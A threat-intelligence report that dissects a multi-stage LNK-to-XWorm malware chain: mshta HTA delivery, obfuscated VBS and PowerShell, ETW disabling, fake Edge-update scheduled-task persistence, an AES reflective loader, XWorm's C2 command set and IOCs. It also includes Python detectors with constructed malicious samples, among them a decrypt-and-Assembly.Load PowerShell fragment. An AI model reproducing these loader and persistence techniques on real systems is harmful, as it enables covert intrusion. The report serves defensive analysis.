From IRS Files to XWorm: Dissecting a Multi‑Stage LNK‑Based Malware Chain
Feb 02, 2026
Executive Summary
This report details the analysis of a multi‑stage malware delivery campaign distributed via a ZIP archive shared on X by researcher Smica83. The archive, titled “Martin Robinson IRS Files”, contains five password‑protected PDFs and a deceptive shortcut file, passwords.txt.lnk, masquerading as a password document. The LNK file serves as the initial access vector and initiates execution when opened.

Rather than delivering a malicious executable, the LNK launches mshta.exe to retrieve a remote HTA payload, enabling the threat actor to bypass traditional attachment‑based defenses. Execution proceeds through a carefully staged chain involving HTA, VBScript, PowerShell, Batch, and .NET components, with each stage responsible for a discrete function. This modular design enables payload flexibility while complicating detection and analysis.
Heavy obfuscation is applied throughout all scripting stages using XOR operations, string manipulation, Base64 encoding, and AES encryption. Persistence is established early via a scheduled task masquerading as a legitimate Microsoft Edge update task, executing an obfuscated VBS file every three minutes. Persistence and loader logic are fully separated from the final payload, allowing the same framework to be reused with different malware families.
The loader DLL implements extensive anti‑analysis controls, including timing checks, virtual machine and sandbox detection, and identification of common debugging and reverse‑engineering tools. Only after these checks pass is the final payload decrypted, loaded, and executed.
The delivered malware is identified as an older Xworm variant (likely 3.x) based on decrypted configuration values, command structure, and the absence of newer features. The payload establishes AES‑encrypted C2 communication, exfiltrates detailed host profiling data (system, hardware, user context, and security products), and awaits encrypted commands from the C2 server. This Xworm variant does not implement its own persistence, relying entirely on the earlier loader stages.
Overall, the campaign demonstrates disciplined tradecraft despite leveraging commodity malware. The use of layered execution, strong obfuscation, anti‑analysis measures, and legitimate‑looking persistence mechanisms indicates an emphasis on stealth and long‑term access rather than rapid exploitation. The IRS‑themed lure and U.S.‑specific terminology suggest primary targeting of U.S.‑based users, with potential spillover into other English‑speaking regions.
Infection Chain

Key Findings
The infection chain begins with a socially engineered LNK file disguised as a password document, which executes mshta.exe to load a remote HTA payload, avoiding direct executable delivery.
Multiple staged scripts (HTA, VBScript, PowerShell, Batch) are used to gradually deploy the final payload, indicating a deliberate multi-layered execution flow designed to evade detection and analysis.
Extensive obfuscation is present across all scripting stages, including XOR operations, string slicing, Base64 encoding, and AES encryption, significantly hindering static analysis.
The malware establishes persistence via a scheduled task masquerading as a legitimate Microsoft Edge update task, executing an obfuscated VBS file every three minutes.
Anti-analysis techniques are heavily employed in the loader stage, including timing checks, virtual machine detection, sandbox detection, and identification of common debugging and reverse engineering tools.
The final payload is identified as an older Xworm variant (likely 3.x), based on configuration strings and the absence of newer features.
Encrypted C2 communication is used to exfiltrate detailed host information, including hardware details, OS information, security products, and user context.
Persistence and execution logic are separated from the final payload, allowing the threat actor to reuse the same loader framework for different malware families.
The lure content and document naming (IRS tax forms, U.S.-specific terminology) suggest primary targeting of U.S.-based users, with potential spillover into other English-speaking regions.
Technical Analysis
The ZIP file contains five password-protected PDFs and a LNK file named passwords.txt.lnk, all disguised as tax return documents belonging to an individual named Martin Robinson.
Stage 0: Password.txt.lnk
The icon of the LNK file is set to SHELL32.dll. The LNK file is configured to execute mshta.exe with arguments pointing to a remote URL, indicating that the payload is an HTA document.

The site joggle.navelyandco.com redirects to https[:]//terazosine.fit/FZDHLARIUVANBDCXVZDG.
Inspecting the HTA file shows that it is executing embedded VBScript code.

Stage 1: Malicious VBScript
At the beginning of execution, the VBScript calls Window.ResizeTo 0,0 and Window.MoveTo -20000,-30000, ensuring the window is completely invisible to the user.
The VBScript is heavily obfuscated and includes multiple functions such as XOR operations, ASCII shifting, reverse XOR ciphers, and a configuration manager that handles global variables. Overall, the script is fairly well structured despite the obfuscation.
The VBScript dynamically constructs a PowerShell script through decoding, XOR operations, and string manipulation, and then executes it.

The generated PowerShell script runs with ExecutionPolicy Bypass and contains a Base64-encoded command. After decoding the Base64 content, the following behavior is observed:

The script creates a directory in the Temp folder, retrieves an additional PowerShell script from a remote URL using (iwr $url -UseBasicParsing).Content, saves it to the Temp directory, executes it, and then deletes both the script and the directory.
Stage 2: Malicious PowerShell Script
This script first retrieves content from a remote site, creates a file named Password.txt in the Temp folder, writes the retrieved content into the file, and executes it.

Since the user initially opened passwords.txt.lnk, this serves as a decoy password file and displays the password Password2026 for the password-protected PDFs, which turns out to be incorrect.
This may indicate that the PDF files themselves are legitimate and not fabricated decoys, but the threat actor does not possess the correct password.
The script then sleeps for five seconds and initializes four different directory paths under locations such as ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization, which are designed to resemble legitimate Microsoft directories.
These folders are created if they do not already exist.

Next, a large hardcoded Base64-like string is written to the file C:\ProgramData\DeliveryCurrentControlSet\SessionManager\Optimization\USOShared\IAKFSHHVEHGYMFUVJTVHEW.txt.

Two additional Base64-like strings are written to separate files in the same directory, each with different filenames.
The script then creates a batch file named 0976B5F2-D5BE-4F90-BFCD-0E096BC83244.bat inside the directory C:\ProgramData\Local\MicrosoftWindows.Client\Microsoft\MicrosoftWindows.Client\D4A80266-9D0A-41A4-A57C-954735A4EF36\BrowserCore\.
This batch script is mildly obfuscated. It first executes set COMPlus_ETWEnabled=0, disabling ETW, and then runs a PowerShell command that executes the script located at C:\ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization\088DA033-FAD4-423E-9983-A0137A0313E7\IdentityCRL\9F92ED07-CE61-4CB2-8897-F4914621A054.ps1.

Next, the script writes an obfuscated Visual Basic Script named 0976B5F2-D5BE-4F90-BFCD-0E096BC83244.vbs to the directory C:\ProgramData\PackageCache\Microsoft\INetCache\PackagedEventProviders\ABEFF09B-C516-4F6F-A5DF-0D7F53B52FC4\.

A scheduled task named MicrosoftEdgeUpdatesTaskMachineUA{15F6155B-AD12-4CD6-810D-46E77564809D} is then created to execute this VBS file every three minutes.
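A defender can flag a task like this one from its definition XML (as exported by schtasks /query /xml, or as carried in the TaskContent field of Security Event ID 4698) without relying on the name alone. The check below is an added example written for this report, not code from the campaign or any vendor; the two task definitions it parses are constructed with made-up GUIDs and paths, and the threshold for a "short" repetition interval (five minutes or less) is a choice made for this example.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# A script file somewhere below C:\ProgramData, named in the action's arguments.
SCRIPT_IN_PROGRAMDATA_RE = re.compile(r"\\ProgramData\\[^\"']*\.(?:vbs|js|ps1|bat|cmd|hta)\b", re.IGNORECASE)
# ISO 8601 duration as used by <Interval>, e.g. PT3M, PT1H, P1DT12H.
DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

# Constructed task definition in the form the Task Scheduler exports (and that Security
# Event ID 4698 carries in TaskContent). The GUIDs and paths are made up for this example.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT3M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2026-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>//B //Nologo "C:\ProgramData\PackageCache\Vendor\11111111-2222-3333-4444-555555555555.vbs"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed baseline shaped like the genuine Edge updater task: the action is MicrosoftEdgeUpdate.exe.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1H</Interval></Repetition>
      <StartBoundary>2026-01-01T00:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>"""


def duration_seconds(text):
    """Convert an ISO 8601 duration to seconds; None if it is not in the expected form."""
    m = DURATION_RE.match(text.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def assess_task(task_name, task_xml, max_interval=300):
    """Return the findings for one task definition (an empty list when nothing stands out)."""
    root = ET.fromstring(task_xml)
    commands = [c.text.strip().strip('"') for c in root.findall(".//t:Actions/t:Exec/t:Command", NS) if c.text]
    arguments = " ".join(a.text for a in root.findall(".//t:Actions/t:Exec/t:Arguments", NS) if a.text)
    basenames = {c.rsplit("\\", 1)[-1].lower() for c in commands}
    findings = []
    if basenames & SCRIPT_HOSTS:
        findings.append("script_host_action")
    if SCRIPT_IN_PROGRAMDATA_RE.search(arguments):
        findings.append("script_in_programdata")
    intervals = [duration_seconds(i.text or "") for i in root.findall(".//t:Repetition/t:Interval", NS)]
    if any(s is not None and s <= max_interval for s in intervals):
        findings.append("short_repetition_interval")
    # Genuine Edge update tasks run MicrosoftEdgeUpdate.exe; a look-alike name with another action is a mismatch.
    if task_name.lstrip("\\").lower().startswith("microsoftedgeupdate") and "microsoftedgeupdate.exe" not in basenames:
        findings.append("edge_updater_name_mismatch")
    return findings


if __name__ == "__main__":
    print(assess_task(r"\MicrosoftEdgeUpdatesTaskMachineUA{00000000-0000-0000-0000-000000000000}", SUSPICIOUS_TASK_XML))
    print(assess_task(r"\MicrosoftEdgeUpdateTaskMachineUA{00000000-0000-0000-0000-000000000000}", BENIGN_TASK_XML))
```

The name mismatch is the cheapest of the four findings to act on: the legitimate Edge update tasks launch MicrosoftEdgeUpdate.exe from Program Files, so any task named like an Edge updater whose action is a script host deserves an alert on its own. The interval check catches the three-minute cadence described above even when the actor changes the task name and the drop directory.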

Finally, an obfuscated PowerShell script named 9F92ED07-CE61-4CB2-8897-F4914621A054.ps1 is written to C:\ProgramData\OneAuth\Microsoft\PackagedEventProviders\DeliveryOptimization\088DA033-FAD4-423E-9983-A0137A0313E7\IdentityCRL\, after which the script exits.

Stage 3: Malicious VBS Loader
The scheduled task executes this Visual Basic Script every three minutes. An initial inspection shows that the script is highly obfuscated, with little to no immediate readability. It contains long strings that are sliced and recombined to dynamically construct additional strings at runtime.

Toward the end of execution, the script uses GetObject(Parameter) followed by RetrievedObject.Get(Param).SpawnInstance_, suggesting process creation through WMI.
The ShowWindow parameter is set to 0 to hide the window. The script then calls .Create(Param1, null, Param2, intProcessID) to spawn a new process.
Further analysis confirms that the VBS script is responsible for executing the previously dropped batch file.

As observed earlier, the batch file’s sole purpose is to disable ETW and execute the PowerShell script written in the earlier stage.
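The process-creation chain described from Stage 0 through this point (mshta.exe fetching a remote HTA, PowerShell started with ExecutionPolicy Bypass and an encoded command, and WMI spawning cmd.exe on a GUID-named batch file under ProgramData) can be expressed as a handful of detection rules over process-creation telemetry. The following is an added example written for this report, not the campaign's code or any vendor's detection content; it runs over constructed Sysmon-style events, and the hosts, paths and GUIDs in them are made up rather than taken from the samples.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1) modelled on the chain
# described above. Hosts, paths and GUIDs are made up for this example and are not the
# campaign's indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://redirector.example/stage0'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand aQB3AHIAIAAkAHUAcgBsAA=="},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r'cmd.exe /c "C:\ProgramData\Local\Vendor\Client\11111111-2222-3333-4444-555555555555.bat"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -File "C:\ProgramData\Vendor\Providers\66666666-7777-8888-9999-000000000000.ps1"'},
    # Benign baseline: an administrator running a maintenance script from Program Files.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -File "C:\Program Files\Vendor\maintenance.ps1"'},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -ExecutionPolicy Bypass (or its -ep short form) together with an encoded command.
# PowerShell accepts -e, -enc and -EncodedCommand; -ep and -ExecutionPolicy must not match.
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE)
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?(?:\s|$)", re.IGNORECASE)
# A .bat/.vbs/.ps1 whose file name is a bare GUID, somewhere below C:\ProgramData.
GUID_SCRIPT_RE = re.compile(
    r"\\ProgramData\\.*\\[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\.(?:bat|vbs|ps1)\b",
    re.IGNORECASE)


def base_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules an event triggers; an empty list means no finding."""
    image, parent, cmd = base_name(event["Image"]), base_name(event["ParentImage"]), event["CommandLine"]
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")                 # Stage 0: LNK -> mshta.exe <URL>
    if image in ("powershell.exe", "pwsh.exe") and BYPASS_RE.search(cmd) and ENCODED_RE.search(cmd):
        hits.append("powershell_bypass_encoded")        # Stage 1: generated PowerShell
    if image in SCRIPT_HOSTS and GUID_SCRIPT_RE.search(cmd):
        hits.append("guid_script_in_programdata")       # Stage 2/3: dropped .bat/.vbs/.ps1
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        hits.append("wmi_spawned_script_host")          # Stage 3: Win32_Process.Create
    return hits


def scan(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

The same predicates map directly onto Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled. The WmiPrvSE.exe parent rule is the most durable of the four: a process created through Win32_Process.Create always has WmiPrvSE.exe as its parent, however heavily the VBS that issues the call is obfuscated.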
Stage 3: Malicious PowerShell Loader
This PowerShell script exhibits a similar obfuscation style to the Visual Basic Script.

Toward the end of the script, the use of New-Object along with parameters 256, 128, CBC, and PKCS7 clearly indicates AES decryption.

After partial deobfuscation, it becomes evident that the script decrypts a payload, loads it as an assembly, and executes it, confirming the payload is a .NET sample.

Further analysis reveals that the three text files written earlier contain fragments of the payload. These fragments are concatenated into a single blob, Base64-decoded, and AES-decrypted.
The final payload is a DLL, and the entry method executed is PPAOMMAIKEGECWICJDLZGHCTJJKW.QMHQXYWOHIEWQJMFCHESCKXOLTNH.
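The structure described in this stage (fragments read from disk, joined, Base64-decoded, AES-decrypted with CBC/PKCS7, and handed straight to Assembly.Load) is a recognisable pipeline that can be scored statically once the script text is readable. The scanner below is an added example written for this report, not the loader's code or any vendor's rule set; the two PowerShell samples it scores are constructed, and their variable, file and type names are illustrative.

```python
import re

# Constructed PowerShell fragment mirroring the decrypt-then-load structure described above;
# the variable names, file names and type names are illustrative, not the loader's own.
LOADER_SAMPLE = r"""
$dir = 'C:\ProgramData\Vendor\Cache'
$parts = @('A.txt', 'B.txt', 'C.txt') | ForEach-Object { Get-Content (Join-Path $dir $_) -Raw }
$blob = [Convert]::FromBase64String(($parts -join ''))
$aes = New-Object System.Security.Cryptography.AesManaged
$aes.KeySize = 256; $aes.BlockSize = 128
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$dec = $aes.CreateDecryptor($key, $iv)
$asm = [System.Reflection.Assembly]::Load($dec.TransformFinalBlock($blob, 0, $blob.Length))
$asm.GetType('Stage.Entry').GetMethod('Run').Invoke($null, $null)
"""

# Constructed benign script using the same AES primitives to decrypt a settings file to disk.
BENIGN_SAMPLE = r"""
$aes = New-Object System.Security.Cryptography.AesManaged
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$dec = $aes.CreateDecryptor($key, $iv)
$plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
[IO.File]::WriteAllBytes('C:\ProgramData\Vendor\settings.json', $plain)
"""

# Each indicator is one observable building block of the loader, listed in pipeline order.
INDICATORS = {
    "fragment_reassembly": re.compile(r"Get-Content[\s\S]*-join", re.IGNORECASE),
    "base64_decode":       re.compile(r"FromBase64String\s*\(", re.IGNORECASE),
    "cbc_pkcs7":           re.compile(r"CipherMode\]::CBC[\s\S]*PaddingMode\]::PKCS7"
                                      r"|PaddingMode\]::PKCS7[\s\S]*CipherMode\]::CBC", re.IGNORECASE),
    "aes_decryptor":       re.compile(r"CreateDecryptor\s*\(", re.IGNORECASE),
    "reflective_load":     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE),
    "reflective_invoke":   re.compile(r"\.GetMethod\s*\([^)]*\)\s*\.Invoke\s*\(", re.IGNORECASE),
}


def score_script(text):
    """Return the indicators present and whether they form an in-memory .NET loader."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Only decrypted or decoded bytes flowing into Assembly.Load make this an in-memory loader;
    # AES on its own is ordinary administrative scripting and must not trip the verdict.
    in_memory_loader = "reflective_load" in hits and ("aes_decryptor" in hits or "base64_decode" in hits)
    return {"indicators": hits, "in_memory_loader": in_memory_loader}


if __name__ == "__main__":
    print("loader:", score_script(LOADER_SAMPLE))
    print("benign:", score_script(BENIGN_SAMPLE))
```

The patterns only fire on readable script text, and the loader as written to disk is obfuscated with sliced strings. The realistic input is therefore the text recorded by PowerShell Script Block Logging (Event ID 4104), which logs script blocks as the engine executes them, after the string-building layer has resolved them.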
Stage 4: Xworm Loader DLL
Initial triage indicates the DLL contains multiple anti-analysis mechanisms, including anti-debugging, anti-dnSpy, and anti-Sandboxie checks. A PDB file path is also present.

The malware creates a mutex named DGARPCRYLZILHXNSOOOIZJIWWZRD and calls a function in a loop where i ranges from 0 to 3, passing the value of i as a parameter during each invocation.

Each iteration performs different functionality.

The malware conducts several anti-analysis checks, including timing checks (sleep and time difference comparison), querying system manufacturer information via WMI (Win32_ComputerSystem) to detect strings such as vmware, virtual, or vbox, checking for SbieDll.dll, and scanning for analysis tools including dnSpy, OllyDbg, x32dbg, x64dbg, Binary Ninja, Immunity Debugger, and WinDbg.
If these checks pass, the malware proceeds to decrypt a hardcoded Base64-encoded blob using Rijndael, loads the decrypted assembly, and executes it.

Stage 5: Xworm Payload
Initial triage using Detect It Easy identifies the malware as Xworm (version range 3.0–5.0). This payload is not obfuscated, as the previous stages already ensured the environment was suitable for execution.

Analyzing the binary in dnSpy shows that it initially sleeps for a few seconds and then attempts to retrieve its configuration by AES-decrypting hardcoded values. If this process fails, execution terminates.
The decrypted configuration values are as follows:
Host: "steinsgroup.org"
Port: "48384"
KEY: "L@sting@123"
SPL: "Xwormmm"
Groub: "Transitive"
USBNM: "USB.exe"
The SPL value Xwormmm indicates an older Xworm variant, likely from the 3.x family rather than more recent versions. This is further supported by the absence of keylogging or more advanced functionality typically seen in newer variants.

The malware then creates a mutex named oFomxvvHZ6rjKRXr and exits if mutex creation fails.

It calls PreventSleep, which uses SetThreadExecutionState to prevent the system from entering sleep mode.

After another short sleep, it creates a thread to initiate encrypted communication with the C2 server.

Upon successful connection, the malware AES-encrypts and sends system information to the C2 server, including:
ProcessorCount, UserName, MachineName, OSVersion, total size of the system drive
UserName, OS name and service pack, architecture (x86/x64)
File last write timestamps
USB propagation status
Administrator privileges status
Camera information via capGetDriverDescriptionA
CPU information via Win32_Processor.deviceid="CPU0"
GPU information via Win32_VideoController
Total physical RAM
Installed antivirus products via root\SecurityCenter2
The malware then receives AES-encrypted commands from the C2 server and decrypts them for execution.
The commands the malware supports, and what each one does, are listed below:
rec: Restarts the application.
CLOSE: Closes the application.
uninstall: Writes and executes a batch file that removes the current process executable from the startup folder, then closes the application.
update: Executes the uninstall routine and starts a new process from executable code supplied as a C2 argument.
DW: Writes and executes PowerShell content received as an argument from the C2.
FM: Invokes the contents of the argument memory stream within the current process.
LN: Downloads a file from the argument URL and executes it.
Urlopen: Creates a GET request for the argument URL and opens it in the browser.
Urlhide: Creates a GET request for the argument URL and opens it within the existing process.
PCShutdown: Executes the shutdown command “shutdown.exe /f /s /t 0”.
PCRestart: Executes the restart command “shutdown.exe /f /r /t 0”.
PCLogoff: Executes the logoff command “shutdown.exe -L”.
RunShell: Executes a command in a shell.
StartDDos: Creates a thread that performs repeated POST requests to the provided host and port, repeating every specified number of seconds until the specified time limit is reached. Host, port, and time limit are provided as arguments.
StopDDos: Stops the DDoS thread.
StartReport: Creates a thread that compares the titles of running processes against a provided list; if a match is found, it sends a message to the C2.
StopReport: Stops the StartReport thread.
Xchat: Live interaction with the victim.
Hosts: Sends the full contents of \drivers\etc\hosts.
Shosts: Modifies the contents of etc\hosts.
DDos: Resends the “DDos” message to the C2.
plugin: Sends all of the plugin names stored in the registry.
savePlugin: Saves the plugin after Base64-decoding and decompressing it.
RemovePlugins: Removes the plugins from the registry.
OfflineGet: Normally used for offline keylogging, but in this sample it sends the error message "OfflineKeylogger Not Enabled" to the C2 server.
$Cap: Takes a screenshot and sends it to the C2 as a memory stream.
This version of XWorm does not implement its own persistence mechanism, as persistence was already established earlier by the threat actor.
IOC
Password.txt.lnk
60596b7090f70f41c94f6660a9f64c5e606eae403705debe86f4bc5d9d6ab67c
2024 Tax Return Documents (MARTIN ROBINSON)-protected.pdf
76f0895587a5c6197296fcaab6362f92e433bc07b46b867030a0cb9cd1ee4af8
2024 Wks FDST AGI-protected.pdf
112a45c1b615ec69107cb631029d0cb82c4436f4a68e2316a7c2dcf7641b575e
CamScanner 02-03-2025 09.25-protected.pdf
d95e413e59052c9d9d3d591089da6021c05e7578d7e70faa260e1bc62013f85f
Form 843-protected.pdf
1e98db5874724feb356581e59b512a065046607d645aaf34b379e687f0453a58
Form 2848 M Robinson-protected.pdf
cc9f4f27543747d727e218566874ce268a58bfc046b20df53edd92cdb4cfd5f1
Malicious HTA Download URL(Redirector)
http[:]//joggle.navelyandco.com
Malicious HTA Download URL
https[:]//terazosine.fit/FZDHLARIUVANBDCXVZDG
Malicious HTA File
1770d29ee22567d5cdd82f6a187a7768202ae86778f01cd46326dad82c673c27
Malicious Powershell Script Download URL
https[:]//terazosine.fit/KAGBLCPMDJUJHWZKFKNG
Malicious Powershell Script
e97e36aef906b1458c545cf3480e18f51bf79697c8c52aab859d263813057cac
Encrypted Payload Fragment File
1d92c9cb5e3dfd50b9a2283dd96816d4df6a97e5eba42b3badd8ce41a4d40668
Encrypted Payload Fragment File
3cfbd2557eef20e2b1302f146a6d951f274db07138f2fabd055c7800ab48aaa9
Encrypted Payload Fragment File
4cc1a95b41a297ca2c68e6ee6811e991508ce4e4c43891116d2838b49c12d24b
Malicious Batch File
d5c01bda43e2eff9b6bea1f572fe912d5822da00b1e419c6dae1997edd0802db
Malicious VBS Loader
f52a994bc0df2b8e7d381a2f2f81cfe3d4ae7453dc66b94f4c23a6f8f2506a6d
Malicious Powershell Loader
b9d3848d39e24af3feef53b9cce4201c7503da827bd663c51a94766d75caeabb
Xworm Loader
5dfc407c36076b543c59321ac9d1971a3b53161e356313fd14a0be04d297d3a4
Xworm Final Payload
611233a9712152e0e7b234351327811e52c0619bea1137bd99255143f28ebb61
C2 Domain
steinsgroup.org
C2 Server IP & Port
185.208.159.115[:]48384
Decoy Password URL
https[:]//terazosine.fit/NNJMVHMXVKOFQJYYOHGF